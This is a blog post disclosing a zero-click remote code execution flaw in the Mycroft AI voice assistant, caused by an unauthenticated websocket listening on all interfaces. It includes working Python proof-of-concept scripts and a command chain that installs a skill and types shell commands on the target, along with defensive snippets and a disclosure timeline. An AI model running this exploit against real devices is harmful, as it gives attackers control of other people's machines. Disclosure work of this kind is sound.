Getting "Zero Click" Remote Code Execution in Mycroft AI vocal assistant

While contributing to open source, I was working with my friend Matteo De Carlo on an AUR package for a really interesting project called Mycroft AI. It’s an AI-powered vocal assistant that started with a crowdfunding campaign in 2015, followed by a more recent one that allowed Mycroft to produce their Mark-I and Mark-II devices. It also runs on Linux desktops and servers and on the Raspberry Pi, and will be available soon™ on the Jaguar F-Type and Land Rover.


Digging in the source code

While looking at the source code, I found an interesting point:

...
host = config.get("host")
port = config.get("port")
route = config.get("route")
validate_param(host, "websocket.host")
validate_param(port, "websocket.port")
validate_param(route, "websocket.route")

routes = [
        (route, WebsocketEventHandler)
]
application = web.Application(routes, **settings)
application.listen(port, host)
ioloop.IOLoop.instance().start()
...

This defines a websocket server that Mycroft uses to receive instructions from remote clients (like the Android one). The settings for the websocket server are defined in mycroft.conf:

// The mycroft-core messagebus' websocket
"websocket": {
  "host": "0.0.0.0",
  "port": 8181,
  "route": "/core",
  "ssl": false
},
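
The key setting here is the bind address: 0.0.0.0 makes the server listen on every network interface rather than only on loopback. As a minimal sketch, assuming the websocket block has already been loaded into a plain dict, a check like the following could flag such a configuration. The helper name `is_exposed` is hypothetical and not part of Mycroft.

```python
import ipaddress


def is_exposed(ws_config):
    """Return True if the websocket would listen beyond the loopback interface."""
    host = ws_config.get("host", "")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal; hostnames are not resolved in this sketch,
        # only the literal name "localhost" is treated as safe.
        return host != "localhost"
    return not addr.is_loopback


config = {"host": "0.0.0.0", "port": 8181, "route": "/core", "ssl": False}
print(is_exposed(config))                           # True
print(is_exposed({**config, "host": "127.0.0.1"}))  # False
```

This only looks at the bind address; a firewall in front of the machine can still block the port.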

So there is a websocket server that doesn’t require authentication and that, by default, is exposed on 0.0.0.0:8181/core. Let’s test it 😉

#!/usr/bin/env python

import asyncio
import json

import websockets

uri = "ws://myserver:8181/core"
command = "say pwned"


async def send_payload():
    # Build the message with json.dumps so quotes in the command are escaped
    message = json.dumps({
        "data": {"utterances": [command]},
        "type": "recognizer_loop:utterance",
        "context": None,
    })
    async with websockets.connect(uri) as websocket:
        await websocket.send(message)

asyncio.run(send_payload())

And magically we have an answer from the vocal assistant saying pwned!

Well, now we can have Mycroft pronounce stuff remotely, but this is not a really big finding unless you want to scare your friends, right?


The skills system

Digging deeper, we can see that Mycroft has a skills system and a default skill that can install other skills (pretty neat, right?)

How is a skill composed? According to the documentation, a default skill is composed of:

vocab/en-us/command.voc contains the vocal command that will trigger the skill
dialog/en-us/answer.dialog contains the answer that Mycroft will pronounce
requirements.txt contains the requirements for the skill that will be installed with pip
__init__.py contains the main function of the skill and will be loaded when the skill is triggered
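
As a rough illustration of that layout, here is a small sketch that reports which of the pieces listed above are missing from a directory. The helper name `missing_parts` is hypothetical, and the check assumes the en-us locale; it only looks at paths and does not load or validate the skill.

```python
from pathlib import Path

# Entries taken from the list above. File names inside vocab/ and dialog/
# vary per skill, so only the directories are checked.
EXPECTED = ["__init__.py", "requirements.txt", "vocab/en-us", "dialog/en-us"]


def missing_parts(skill_dir):
    """Return the expected entries that are absent from skill_dir."""
    root = Path(skill_dir)
    return [part for part in EXPECTED if not (root / part).exists()]
```

Calling `missing_parts` on a complete skill directory returns an empty list.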

What can I do now?

I could create a malicious skill that runs arbitrary code on the remote machine when triggered. Unfortunately, a skill cannot be installed via vocal command unless its URL has been whitelisted on the online website. So this is possible, but a little tricky.

So I’m done?

Not yet. I found out that I can trigger skills remotely, and that it is possible to execute commands on a remote machine by convincing the user to install a malicious skill. I may have enough to submit a vulnerability report. But maybe I can do a bit better…

Getting a remote shell using default skills

We know that Mycroft has some default skills, like open, which opens an application, and others that are whitelisted but not installed. Reading through the list, I found a really interesting skill called skill-autogui, whose description says "Manipulate your mouse and keyboard with Mycroft". We got it!

Let’s try to combine everything we found so far into a PoC:

#!/usr/bin/env python

import asyncio
import json
import sys

import websockets

# "mute audio" is sent first, then the commands given on the command line
cmds = ["mute audio"] + sys.argv[1:]
uri = "ws://myserver:8181/core"


async def send_payload():
    for payload in cmds:
        # json.dumps escapes any quotes contained in the payload
        message = json.dumps({
            "data": {"utterances": [payload]},
            "type": "recognizer_loop:utterance",
            "context": None,
        })
        async with websockets.connect(uri) as websocket:
            await websocket.send(message)
            # Non-blocking pause before sending the next command
            await asyncio.sleep(1)

asyncio.run(send_payload())

Running the exploit with python pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" finally gave me command execution on a Linux machine.



Notes

open xterm was needed because my test Linux environment had a DE installed. On a remote server the commands will be executed directly on the TTY, so this step is not necessary.
The skill branching went through a big change and some skills are not (yet) available (autogui is one of them), but this is not the real point. Mycroft has skills to interact with home automation systems and other services that can still be manipulated (lack of imagination is the only limit here). The vulnerability lies in the lack of authentication for the websocket.
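
To make the missing piece concrete, here is a hypothetical sketch of the kind of shared-secret check a websocket handler could run before accepting a connection. Nothing like this existed in the code shown above; the function name `is_authorized` and the idea of a pre-shared token are assumptions made purely for illustration.

```python
import hmac


def is_authorized(presented_token, expected_token):
    """Compare a client-supplied token with the configured one in constant time."""
    if not presented_token or not expected_token:
        # Reject when either side has no token at all
        return False
    return hmac.compare_digest(
        presented_token.encode("utf-8"),
        expected_token.encode("utf-8"),
    )
```

A handler would refuse the connection whenever this returns False. How the token reaches the server (header, query string, first message) is left open here.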

Affected devices

All devices running Mycroft <= ? with the websocket server exposed (the Mark-I has the websocket behind a firewall by default).
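
A quick way to see whether a given machine is reachable on that port is a plain TCP connection attempt. The sketch below uses only the standard library; `port_is_open` is a hypothetical helper name, and an open port only shows that something is listening, not that it is Mycroft.

```python
import socket


def port_is_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and name resolution failures
        return False
```

For the default configuration from this post, the call would be `port_is_open("myserver", 8181)`.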

Timeline

08/03/2018 Vulnerability found
09/03/2018 Vulnerability reported
13/03/2018 The CTO answered that they were aware of this problem and were working on a patch
06/06/2018 The CTO said that they had no problem with the disclosure of the vulnerability and would add a warning to remind the user to use a firewall ¯\_(ツ)_/¯
09/06/2018 Public disclosure